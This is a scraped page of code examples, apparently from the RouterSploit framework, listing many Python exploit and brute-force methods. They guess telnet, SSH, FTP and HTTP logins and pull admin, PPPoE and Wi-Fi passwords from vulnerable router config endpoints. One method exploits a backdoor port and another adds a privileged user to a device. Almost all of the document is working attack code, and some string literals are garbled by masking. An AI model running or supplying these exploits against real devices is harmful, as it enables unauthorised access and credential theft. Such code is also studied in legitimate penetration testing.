コード例 #1
0
    def attack(self):
        try:
            tn = telnetlib.Telnet(self.target, self.port)
            tn.expect(["login: "******"Login: "******"Connection error {}:{}".format(self.target, self.port))
            return

        if self.usernames.startswith("file://"):
            usernames = open(self.usernames[7:], "r")
        else:
            usernames = [self.usernames]

        if self.passwords.startswith("file://"):
            passwords = open(self.passwords[7:], "r")
        else:
            passwords = [self.passwords]

        collection = LockedIterator(itertools.product(usernames, passwords))
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #2
0
    def attack(self):
        url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))

        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code != 401:
            print_status("Target is not protected by Basic Auth")
            return

        if self.usernames.startswith('file://'):
            usernames = open(self.usernames[7:], 'r')
        else:
            usernames = [self.usernames]

        if self.passwords.startswith('file://'):
            passwords = open(self.passwords[7:], 'r')
        else:
            passwords = [self.passwords]

        collection = LockedIterator(itertools.product(usernames, passwords))

        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #3
0
    def run(self):
        self.credentials = []

        try:
            tn = telnetlib.Telnet(self.target, self.port)
            tn.expect(["login: "******"Login: "******"Connection error {}:{}".format(
                self.target, self.port))
            return

        if self.defaults.startswith('file://'):
            defaults = open(self.defaults[7:], 'r')
        else:
            defaults = [self.defaults]

        collection = LockedIterator(defaults)
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #4
0
    def ftp_get_config(self):
        print_status("FTP {}:{} Trying FTP authentication with Username: {} and Password: {}".format(self.target,
                                                                                                     self.ftp_port,
                                                                                                     self.remote_user,
                                                                                                     self.remote_pass))
        ftp = ftplib.FTP()

        try:
            ftp.connect(self.target, port=int(self.ftp_port), timeout=10)
            ftp.login(self.remote_user, self.remote_pass)

            print_success("FTP {}:{} Authentication successful".format(self.target, self.ftp_port))
            if self.config_path in ftp.nlst():
                print_status("FTP {}:{} Downloading: {}".format(self.target, self.ftp_port, self.config_path))
                r = StringIO()
                ftp.retrbinary('RETR {}'.format(self.config_path), r.write)
                ftp.close()
                data = r.getvalue()

                creds = re.findall(r'add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n', data)
                if creds:
                    print_success("Found encrypted credentials:")
                    print_table(('Name', 'Password', 'Role', 'Hash2', 'Crypt'), *creds)
                    return creds
                else:
                    print_error("Exploit failed - could not find any credentials")
        except ftplib.all_errors:
            print_error("Exploit failed - FTP error")

        return None
コード例 #5
0
    def run(self):
        url = sanitize_url("{}:{}/hidden_info.html".format(
            self.target, self.port))

        response = http_request(method="GET", url=url)
        if response is None:
            return

        creds = []
        data = [
            '2.4G SSID', '2.4G PassPhrase', '5G SSID', '5G PassPhrase',
            'PIN Code'
        ]

        for d in data:
            regexp = "<td nowrap><B>{}:</B></td>\r\n\t\t\t<td>(.+?)</td>".format(
                d)
            val = re.findall(regexp, response.text)

            if len(val):
                creds.append((d, val[0]))

        if len(creds):
            print_success("Credentials found!")
            headers = ("Option", "Value")
            print_table(headers, *creds)
        else:
            print_error("Credentials could not be found")
コード例 #6
0
    def run(self):
        url = sanitize_url("{}:{}/SaveCfgFile.cgi".format(self.target, self.port))

        try:
            r = requests.get(url, verify=False)
            res = r.text
        except requests.exceptions.ConnectionError:
            print_error("Connection error: %s" % url)
            return

        var = ['pppoe_username',
                'pppoe_password',
                'wl0_pskkey',
                'wl0_key1',
                'mradius_password',
                'mradius_secret',
                'httpd_password',
                'http_passwd',
                'pppoe_passwd']

        data = []
        for v in var:
            regexp = '{}="(.+?)"'.format(v)

            val = re.findall(regexp, res)
            if len(val):
                data.append((v, val[0]))

        if len(data):
            print_success("Exploit success")
            headers = ("Option", "Value")
            print_table(headers, *data)

        else:
            print_error("Exploit failed")
コード例 #7
0
    def run(self):
        # address and parameters
        url = sanitize_url("{}:{}/getcfg.php".format(self.target, self.port))
        data = {"SERVICES": "DEVICE.ACCOUNT"}

        # connection
        try:
            r = requests.post(url, data=data)
            res = r.text
        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
            print_error("Invalid URL format: %s" % url)
            return
        except requests.exceptions.ConnectionError:
            print_error("Connection error: %s" % url)
            return

        # extracting credentials
        regular = "<name>(.+?)</name><usrid>(|.+?)</usrid><password>(|.+?)</password>"
        creds = re.findall(regular, re.sub('\s+', '', res))

        # displaying results
        if len(creds):
            print_success("Credentials found!")

            headers = ('Username', 'Password')
            creds = tuple(tuple([item[0], item[2]]) for item in creds)
            print_table(headers, *creds)
        else:
            print_error("Credentials could not be found")
コード例 #8
0
    def run(self):
        if self.check():
            print_success("Target is vulnerable")

            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(30)
            s.connect((self.target, 32764))

            conf = self.execute(s, 1)
            lines = re.split("\x00|\x01", conf)
            pattern = re.compile('user(name)?|password|login')

            credentials = []

            for line in lines:
                try:
                    (var, value) = line.split("=")
                    if len(value) > 0 and pattern.search(var):
                        credentials.append((var, value))
                except ValueError:
                    pass

            if len(credentials):
                print_table(("Parameter", "Value"), *credentials)
        else:
            print_error("Target is not vulnerable")
コード例 #9
0
    def run(self):
        creds = []
        url = "{}:{}/backupsettings.conf".format(self.target, self.port)

        response = http_request(method="GET",
                                url=url,
                                auth=(self.def_user, self.def_pass))
        if response is None:
            print_error("Exploit failed")
            return

        res = re.findall('<AdminPassword>(.+?)</AdminPassword>', response.text)

        if len(res):
            print_success("Found strings: {}".format(res[0]))

            try:
                print_status("Trying to base64 decode")
                password = base64.b64decode(res[0])
            except:
                print_error("Exploit failed - could not decode password")
                return

            creds.append(("admin", password))

            print_success("Credentials found!")
            print_table(("Login", "Password"), *creds)
        else:
            print_error("Credentials could not be found")
コード例 #10
0
    def attack(self):
        try:
            tn = telnetlib.Telnet(self.target, self.port)
            tn.expect(["login: "******"Login: "******"Connection error {}:{}".format(self.target, self.port))
            return

        if self.usernames.startswith('file://'):
            usernames = open(self.usernames[7:], 'r')
        else:
            usernames = [self.usernames]

        if self.passwords.startswith('file://'):
            passwords = open(self.passwords[7:], 'r')
        else:
            passwords = [self.passwords]

        collection = LockedIterator(itertools.product(usernames, passwords))
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #11
0
    def attack(self):
        url = "{}:{}{}".format(self.target, self.port, self.path)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code != 401:
            print_status("Target is not protected by Basic Auth")
            return

        if self.usernames.startswith('file://'):
            usernames = open(self.usernames[7:], 'r')
        else:
            usernames = [self.usernames]

        if self.passwords.startswith('file://'):
            passwords = open(self.passwords[7:], 'r')
        else:
            passwords = [self.passwords]

        collection = itertools.product(usernames, passwords)

        with threads.ThreadPoolExecutor(self.threads) as executor:
            for record in collection:
                executor.submit(self.target_function, url, record)

        if self.credentials:
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #12
0
    def run(self):
        self.credentials = []
        ssh = paramiko.SSHClient()

        try:
            ssh.connect(self.target, port=self.port)
        except socket.error:
            print_error("Connection error: %s:%s" %
                        (self.target, str(self.port)))
            ssh.close()
            return
        except:
            pass

        ssh.close()

        if self.defaults.startswith('file://'):
            defaults = open(self.defaults[7:], 'r')
        else:
            defaults = [self.defaults]

        collection = LockedIterator(defaults)
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #13
0
    def attack(self):
        ssh = paramiko.SSHClient()

        try:
            ssh.connect(self.target, port=self.port)
        except socket.error:
            print_error("Connection error: %s:%s" %
                        (self.target, str(self.port)))
            ssh.close()
            return
        except Exception:
            pass

        ssh.close()

        if self.usernames.startswith('file://'):
            usernames = open(self.usernames[7:], 'r')
        else:
            usernames = [self.usernames]

        if self.passwords.startswith('file://'):
            passwords = open(self.passwords[7:], 'r')
        else:
            passwords = [self.passwords]

        collection = LockedIterator(itertools.product(usernames, passwords))
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #14
0
    def attack(self):
        url = "{}:{}{}".format(self.target, self.port, self.path)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code != 401:
            print_status("Target is not protected by Basic Auth")
            return

        if self.usernames.startswith('file://'):
            usernames = open(self.usernames[7:], 'r')
        else:
            usernames = [self.usernames]

        if self.passwords.startswith('file://'):
            passwords = open(self.passwords[7:], 'r')
        else:
            passwords = [self.passwords]

        collection = itertools.product(usernames, passwords)

        with threads.ThreadPoolExecutor(self.threads) as executor:
            for record in collection:
                executor.submit(self.target_function, url, record)

        if self.credentials:
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #15
0
    def attack(self):
        url = "{}:{}{}".format(self.target, self.port, self.path)

        response = http_request("GET", url)
        if response is None:
            return

        if response.status_code != 401:
            print_status("Target is not protected by Digest Auth")
            return

        if self.defaults.startswith('file://'):
            defaults = open(self.defaults[7:], 'r')
        else:
            defaults = [self.defaults]

        with ThreadPoolExecutor(self.threads) as executor:
            for record in defaults:
                username, password = record.split(':')
                executor.submit(self.target_function, url, username, password)

        if self.credentials:
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")

        defaults.close()
コード例 #16
0
    def run(self):
        self.credentials = []
        url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))

        try:
            r = requests.get(url, verify=False)
        except (requests.exceptions.MissingSchema,
                requests.exceptions.InvalidSchema):
            print_error("Invalid URL format: %s" % url)
            return
        except requests.exceptions.ConnectionError:
            print_error("Connection error: %s" % url)
            return

        if r.status_code != 401:
            print_status("Target is not protected by Basic Auth")
            return

        if self.defaults.startswith('file://'):
            defaults = open(self.defaults[7:], 'r')
        else:
            defaults = [self.defaults]

        collection = LockedIterator(defaults)
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #17
0
    def attack(self):
        url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))

        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code != 401:
            print_status("Target is not protected by Basic Auth")
            return

        if self.usernames.startswith('file://'):
            usernames = open(self.usernames[7:], 'r')
        else:
            usernames = [self.usernames]

        if self.passwords.startswith('file://'):
            passwords = open(self.passwords[7:], 'r')
        else:
            passwords = [self.passwords]

        collection = LockedIterator(itertools.product(usernames, passwords))

        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #18
0
    def run(self):
        url = sanitize_url("{}:{}/hidden_info.html".format(self.target, self.port))

        try:
            r = requests.get(url)
            res = r.text
        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
            print_error("Invalid URL format: %s" % url)
            return
        except requests.exceptions.ConnectionError:
            print_error("Connection error: %s" % url)
            return

        creds = []
        data = ['2.4G SSID', '2.4G PassPhrase', '5G SSID', '5G PassPhrase', 'PIN Code']

        for d in data:
            regexp = "<td nowrap><B>{}:</B></td>\r\n\t\t\t<td>(.+?)</td>".format(d)
            val = re.findall(regexp, res)

            if len(val):
                creds.append((d, val[0]))

        if len(creds):
            print_success("Credentials found!")

            headers = ("Option", "Value")
            print_table(headers, *creds)

        else:
            print_error("Credentials could not be found")
コード例 #19
0
    def run(self):
        self.credentials = []

        try:
            tn = telnetlib.Telnet(self.target, self.port)
            tn.expect(["login: "******"Login: "******"Connection error {}:{}".format(self.target, self.port))
            return

        if self.defaults.startswith('file://'):
            defaults = open(self.defaults[7:], 'r')
        else:
            defaults = [self.defaults]

        collection = LockedIterator(defaults)
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #20
0
    def run(self):
        self.credentials = []
        print_status("Running module...")
        ssh = paramiko.SSHClient()

        try:
            ssh.connect(self.target, port=self.port)
        except socket.error:
            print_error("Connection error: %s:%s" % (self.target, str(self.port)))
            ssh.close()
            return
        except:
            pass

        ssh.close()

        if self.usernames.startswith('file://'):
            usernames = open(self.usernames[7:], 'r')
        else:
            usernames = [self.usernames]

        if self.passwords.startswith('file://'):
            passwords = open(self.passwords[7:], 'r')
        else:
            passwords = [self.passwords]

        collection = LockedIterator(itertools.product(usernames, passwords))
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #21
0
    def run(self):
        url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port))

        print_status("Running module...")
        try:
            r = requests.get(url)
            res = r.text
        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
            print_error("Invalid URL format: %s" % url)
            return
        except requests.exceptions.ConnectionError:
            print_error("Connection error: %s" % url)
            return

        try:
            data = json.loads(res)
            print_status("Decoding JSON value")
        except ValueError:
            print_error("Response is not valid JSON")
            return

        if len(data):
            print_success("Exploit success")

        rows = []
        for key in data.keys():
            if len(data[key]) > 0:
                rows.append((key, data[key]))

        headers = ("Parameter", "Value")
        print_table(headers, *rows)
コード例 #22
0
    def run(self):
        print_status("Running module...")

        self.credentials = []
        url = sanitize_url("{}:{}".format(self.target, self.port))

        try:
            r = requests.get(url)
        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
            print_error("Invalid URL format: %s" % url)
            return
        except requests.exceptions.ConnectionError:
            print_error("Connection error: %s" % url)
            return

        if r.status_code != 401:
            print_status("Target is not protected by Basic Auth")
            return

        if self.defaults.startswith('file://'):
            defaults = open(self.defaults[7:], 'r')
        else:
            defaults = [self.defaults]

        collection = LockedIterator(defaults)
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #23
0
    def run(self):
        creds = []
        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))

#        print_status("Requesting for {}".format(url))

        response = http_request(method="GET", url=url)
        if response is None:
            return

        admin = re.findall("pwdAdmin = '(.+?)'", response.text)
        if admin:
            creds.append(('admin', admin[0]))

        support = re.findall("pwdSupport = '(.+?)'", response.text)
        if support:
            creds.append(('support', support[0]))

        user = re.findall("pwdUser = '******'", response.text)
        if user:
            creds.append(('user', user[0]))

        if creds:
            print_success("Credentials found!")
            print_table(("Login", "Password"), *creds)
        else:
            print_error("Credentials could not be found")
コード例 #24
0
    def run(self):
        url = "{}:{}/SaveCfgFile.cgi".format(self.target, self.port)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        var = ['pppoe_username',
                'pppoe_password',
                'wl0_pskkey',
                'wl0_key1',
                'mradius_password',
                'mradius_secret',
                'httpd_password',
                'http_passwd',
                'pppoe_passwd']

        data = []
        for v in var:
            regexp = '{}="(.+?)"'.format(v)

            val = re.findall(regexp, response.text)
            if len(val):
                data.append((v, val[0]))

        if len(data):
            print_success("Exploit success")
            headers = ("Option", "Value")
            print_table(headers, *data)

        else:
            print_error("Exploit failed")
コード例 #25
0
    def run(self):
        if self.check():
            url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
            print_status("Requesting for {}".format(url))

            response = http_request(method="GET", url=url)
            if response is None:
                return

            regexps = [("admin", "pwdAdmin = '(.+?)'"),
                       ("support", "pwdSupport = '(.+?)'"),
                       ("user", "pwdUser = '******'")]

            creds = []
            for regexp in regexps:
                res = re.findall(regexp[1], response.text)

                if len(res):
                    creds.append((regexp[0], b64decode(res[0])))

            if len(creds):
                print_success("Credentials found!")
                headers = ("Login", "Password")
                print_table(headers, *creds)
                print("NOTE: Admin is commonly implemented as root")
            else:
                print_error("Credentials could not be found")
        else:
            print_error("Device seems to be not vulnerable")
コード例 #26
0
    def run(self):
        creds = []
        url = "{}:{}/password.cgi".format(self.target, self.port)

        print_status("Requesting {}".format(url))
        response = http_request(method="GET", url=url)
        if response is None:
            print_error("Exploit failed - empty response")
            return

        tokens = [
            ("admin", r"pwdAdmin = '(.+?)'"),
            ("support", r"pwdSupport = '(.+?)'"),
            ("user", r"pwdUser = '******'")
        ]

        print_status("Trying to extract credentials")
        for token in tokenize(tokens, response.text):
            creds.append((token.typ, token.value[-1]))

        if creds:
            print_success("Credentials found")
            print_table(("Login", "Password"), *creds)
        else:
            print_error("Exploit failed - credentials could not be found")
コード例 #27
0
ファイル: ftp_default.py プロジェクト: JPaulMora/routersploit
    def attack(self):
        ftp = ftplib.FTP()
        try:
            ftp.connect(self.target, port=int(self.port), timeout=10)
        except (socket.error, socket.timeout):
            print_error("Connection error: %s:%s" % (self.target, str(self.port)))
            ftp.close()
            return
        except:
            pass
        ftp.close()

        if self.defaults.startswith('file://'):
            defaults = open(self.defaults[7:], 'r')
        else:
            defaults = [self.defaults]

        collection = LockedIterator(defaults)
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #28
0
    def run(self):
        creds = []
        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))

        #        print_status("Requesting for {}".format(url))

        response = http_request(method="GET", url=url)
        if response is None:
            return

        admin = re.findall("pwdAdmin = '(.+?)'", response.text)
        if admin:
            creds.append(('admin', admin[0]))

        support = re.findall("pwdSupport = '(.+?)'", response.text)
        if support:
            creds.append(('support', support[0]))

        user = re.findall("pwdUser = '******'", response.text)
        if user:
            creds.append(('user', user[0]))

        if creds:
            print_success("Credentials found!")
            print_table(("Login", "Password"), *creds)
        else:
            print_error("Credentials could not be found")
コード例 #29
0
    def attack(self):
        url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))

        response = http_request("GET", url)
        if response is None:
            return

        if response.status_code != 401:
            print_status("Target is not protected by Basic Auth")
            return

        if self.defaults.startswith('file://'):
            defaults = open(self.defaults[7:], 'r')
        else:
            defaults = [self.defaults]

        collection = LockedIterator(defaults)
        self.run_threads(self.threads, self.target_function, collection)

        if self.credentials:
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")

        defaults.close()
コード例 #30
0
    def run(self):
        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))

        print_status("Requesting for {}".format(url))

        response = http_request(method="GET", url=url)
        if response is None:
            return

        creds = []
        admin = re.findall("pwdAdmin = '(.+?)'", response.text)
        if len(admin):
            creds.append(('Admin', b64decode(admin[0])))

        support = re.findall("pwdSupport = '(.+?)'", response.text)
        if len(support):
            creds.append(('Support', b64decode(support[0])))

        user = re.findall("pwdUser = '******'", response.text)
        if len(user):
            creds.append(('User', b64decode(user[0])))

        if len(creds):
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *creds)
            print("NOTE: Admin is commonly implemented as root")
        else:
            print_error("Credentials could not be found")
コード例 #31
0
    def run(self):
        creds = []
        url = "{}:{}/backupsettings.conf".format(self.target, self.port)

        response = http_request(method="GET", url=url, auth=(self.def_user, self.def_pass))
        if response is None:
            print_error("Exploit failed")
            return

        res = re.findall('<AdminPassword>(.+?)</AdminPassword>', response.text)

        if len(res):
            print_success("Found strings: {}".format(res[0]))

            try:
                print_status("Trying to base64 decode")
                password = base64.b64decode(res[0])
            except Exception:
                print_error("Exploit failed - could not decode password")
                return

            creds.append(("admin", password))

            print_success("Credentials found!")
            print_table(("Login", "Password"), *creds)
        else:
            print_error("Credentials could not be found")
コード例 #32
0
    def attack(self):
        ssh = paramiko.SSHClient()

        try:
            ssh.connect(self.target, port=self.port)
        except socket.error:
            print_error("Connection error: %s:%s" % (self.target, str(self.port)))
            ssh.close()
            return
        except:
            pass

        ssh.close()

        if self.defaults.startswith('file://'):
            defaults = open(self.defaults[7:], 'r')
        else:
            defaults = [self.defaults]

        collection = LockedIterator(defaults)
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #33
0
    def run(self):
        if self.check():
            print_success("Target is vulnerable")

            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(30)
            s.connect((self.target, 32764))

            conf = self.execute(s, 1)
            lines = re.split("\x00|\x01", conf)
            pattern = re.compile('user(name)?|password|login');

            credentials = []
            
            for line in lines:
                try:
                    (var, value) = line.split("=")
                    if len(value)>0 and pattern.search(var):
                        credentials.append((var, value))
                except ValueError:
                    pass

            if len(credentials):
                print_table(("Parameter", "Value"), *credentials)
        else:
            print_error("Target is not vulnerable")
コード例 #34
0
    def run(self):
        url = sanitize_url(
            "{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703"
            .format(self.target, self.port))

        response = http_request(method="GET", url=url)
        if response is None:
            return

        try:
            print_status("Decoding JSON")
            data = json.loads(response.text)
        except ValueError:
            print_error("Exploit failed - response is not valid JSON")
            return

        if len(data):
            print_success("Exploit success")

        rows = []
        for key in data.keys():
            if len(data[key]) > 0:
                rows.append((key, data[key]))

        headers = ("Parameter", "Value")
        print_table(headers, *rows)
コード例 #35
0
    def run(self):

        if self.check():
            print_success("Target appears to be vulnerable.")

            admin_id = None
            admin_password = None

            if self.config_content and len(self.config_content):

                for line in self.config_content.split("\n"):
                    line = line.strip()

                    m_groups = re.match(r'AdminID=(.*)', line, re.I | re.M)
                    if m_groups:
                        print_success("Found Admin ID.")
                        admin_id = m_groups.group(1)

                    m_groups = re.match(r'AdminPassword=(.*)', line, re.I | re.M)
                    if m_groups:
                        print_success("Found Admin password.")
                        admin_password = m_groups.group(1)
                        break

                print_table(("AdminId", "Password"), (admin_id, admin_password))

        else:
            print_error("Exploit failed - target seems to be not vulnerable")
コード例 #36
0
    def run(self):
        url = "{}:{}/SaveCfgFile.cgi".format(self.target, self.port)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        var = [
            'pppoe_username',
            'pppoe_password',
            'wl0_pskkey',
            'wl0_key1',
            'mradius_password',
            'mradius_secret',
            'httpd_password',
            'http_passwd',
            'pppoe_passwd'
        ]

        data = []
        for v in var:
            regexp = '{}="(.+?)"'.format(v)

            val = re.findall(regexp, response.text)
            if len(val):
                data.append((v, val[0]))

        if len(data):
            print_success("Exploit success")
            headers = ("Option", "Value")
            print_table(headers, *data)

        else:
            print_error("Exploit failed")
コード例 #37
0
    def run(self):
        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))

        print_status("Requesting for {}".format(url))

        response = http_request(method="GET", url=url)
        if response is None:
            return

        creds = []
        admin = re.findall("pwdAdmin = '(.+?)'", response.text)
        if len(admin):
            creds.append(('Admin', b64decode(admin[0])))

        support = re.findall("pwdSupport = '(.+?)'", response.text)
        if len(support):
            creds.append(('Support', b64decode(support[0])))

        user = re.findall("pwdUser = '******'", response.text)
        if len(user):
            creds.append(('User', b64decode(user[0])))

        if len(creds):
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *creds)
            print("NOTE: Admin is commonly implemented as root")
        else:
            print_error("Credentials could not be found")
コード例 #38
0
    def ftp_get_config(self):
        print_status("FTP {}:{} Trying FTP authentication with Username: {} and Password: {}".format(self.target,
                                                                                                     self.ftp_port,
                                                                                                     self.remote_user,
                                                                                                     self.remote_pass))
        ftp = ftplib.FTP()

        try:
            ftp.connect(self.target, port=int(self.ftp_port), timeout=10)
            ftp.login(self.remote_user, self.remote_pass)

            print_success("FTP {}:{} Authentication successful".format(self.target, self.ftp_port))
            if self.config_path in ftp.nlst():
                print_status("FTP {}:{} Downloading: {}".format(self.target, self.ftp_port, self.config_path))
                r = StringIO()
                ftp.retrbinary('RETR {}'.format(self.config_path), r.write)
                ftp.close()
                data = r.getvalue()

                creds = re.findall(r'add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n', data)
                if creds:
                    print_success("Found encrypted credentials:")
                    print_table(('Name', 'Password', 'Role', 'Hash2', 'Crypt'), *creds)
                    return creds
                else:
                    print_error("Exploit failed - could not find any credentials")
        except ftplib.all_errors:
            print_error("Exploit failed - FTP error")

        return None
コード例 #39
0
    def run(self):

        if self.check():
            print_success("Target appears to be vulnerable.")

            admin_id = None
            admin_password = None

            if self.config_content and len(self.config_content):

                for line in self.config_content.split("\n"):
                    line = line.strip()

                    m_groups = re.match(r'AdminID=(.*)', line, re.I | re.M)
                    if m_groups:
                        print_success("Found Admin ID.")
                        admin_id = m_groups.group(1)

                    m_groups = re.match(r'AdminPassword=(.*)', line,
                                        re.I | re.M)
                    if m_groups:
                        print_success("Found Admin password.")
                        admin_password = m_groups.group(1)
                        break

                print_table(("AdminId", "Password"),
                            (admin_id, admin_password))

        else:
            print_error("Exploit failed - target seems to be not vulnerable")
コード例 #40
0
    def attack(self):
        url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))

        response = http_request("GET", url)
        if response is None:
            return

        if response.status_code != 401:
            print_status("Target is not protected by Basic Auth")
            return

        if self.defaults.startswith('file://'):
            defaults = open(self.defaults[7:], 'r')
        else:
            defaults = [self.defaults]

        collection = LockedIterator(defaults)
        self.run_threads(self.threads, self.target_function, collection)

        if self.credentials:
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")

        defaults.close()
コード例 #41
0
    def attack(self):
        ftp = ftplib.FTP()
        try:
            ftp.connect(self.target, port=int(self.port), timeout=10)
        except (socket.error, socket.timeout):
            print_error("Connection error: %s:%s" %
                        (self.target, str(self.port)))
            ftp.close()
            return
        except:
            pass
        ftp.close()

        if self.usernames.startswith('file://'):
            usernames = open(self.usernames[7:], 'r')
        else:
            usernames = [self.usernames]

        if self.passwords.startswith('file://'):
            passwords = open(self.passwords[7:], 'r')
        else:
            passwords = [self.passwords]

        collection = LockedIterator(itertools.product(usernames, passwords))

        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
コード例 #42
0
    def run(self):
        creds = []
        password = self.get_wifi_key()

        if password is not None:
            creds.append(("WiFi Password", password))
            print_success("Target seems to be vulnerable")
            print_table(("Parameter", "Value"), *creds)
        else:
            print_error("Target seems to be not vulnerable")
コード例 #43
0
    def run(self):
        creds = []
        password = self.get_wifi_key()

        if password is not None:
            creds.append(("WiFi Password", password))
            print_success("Target seems to be vulnerable")
            print_table(("Parameter", "Value"), *creds)
        else:
            print_error("Target seems to be not vulnerable")
コード例 #44
0
    def run(self):
        if self.check():
            print_success("Target appears to be vulnerable")

            print_status("Extracting user information...")
            m_groups = self.extract_users(self.response_content)
            if m_groups and m_groups.groups > 2:
                print_table(("User Info", ), (m_groups.group(2), ))
            else:
                # Print something, in case that formats vary over models
                # maybe regex will not work and we don't want to leave
                # users without information
                print_table(("User Info", ), (self.response_content, ))

            print_status("Trying to add new user...")
            url = "{}:{}/form/User_Accounts_Apply".format(
                self.target, self.port)
            data = {
                "action": "0",
                "username": self.username,
                "privilege": "15",
                "type": "0",
                "password": self.password
            }

            headers = {
                "Connection": "keep-alive",
                "Cache-Control": "max-age=0",
                "Origin": "{}:{}/".format(self.target, self.port),
                "Upgrade-Insecure-Requests": "1",
                "User-Agent":
                "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.51 Safari/537.36",
                "Content-Type": "application/x-www-form-urlencoded",
                "Accept":
                "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                "Referer":
                "{}:{}/www/login.html".format(self.target, self.port),
                "Accept-Encoding": "gzip, deflate",
                "Accept-Language": "en-US,en;q=0.8"
            }

            response = http_request(method="POST",
                                    url=url,
                                    headers=headers,
                                    data=data)

            if response is not None:
                print_success(
                    "Exploit success - new user added: {} / {}".format(
                        self.username, self.password))
